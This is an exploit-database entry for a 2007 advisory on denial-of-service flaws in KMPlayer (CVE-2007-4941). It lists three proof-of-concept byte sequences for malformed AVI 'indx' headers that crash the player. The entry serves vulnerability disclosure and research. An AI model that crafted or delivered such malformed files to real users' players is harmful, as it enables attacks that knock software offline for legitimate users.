[] NeoSense
E X P L O I T S
title author type platform port cve id

KMPlayer 2.9.3.1214 - Multiple Remote Denial of Service Vulnerabilities

Author: Code Audit Labs
type: dos
platform: linux
port: 
date_added: 2007-09-12 
date_updated: 2013-12-30 
verified: 1 
codes: CVE-2007-4941;OSVDB-45939 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/25651/info

KMPlayer is prone to multiple denial-of-service vulnerabilities when handling malformed AVI media files.

Successfully exploiting this issue allows remote attackers to deny service to legitimate users.

These issues affect KMPlayer 2.9.3.1210; other versions may also be vulnerable.

new_avihead_poc1.avi
------------------------------------------
69 6E 64 78 FF FF FF FF 01 00 64 73 20 00 00 10

indx truck size 0xffffffff
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020

new_avihead_poc2.avi
------------------------------------------
69 6E 64 78 00 FF FF FF FF FF 64 73 FF FF FF FF

indx truck size 0xffffff00
wLongsPerEntry 0xffff
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0xFFFFFFFF

new_avihead_poc3.avi
------------------------------------------
69 6E 64 78 00 FF FF FF 01 11 64 73 20 00 00 10

indx truck size 0xffffff00
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.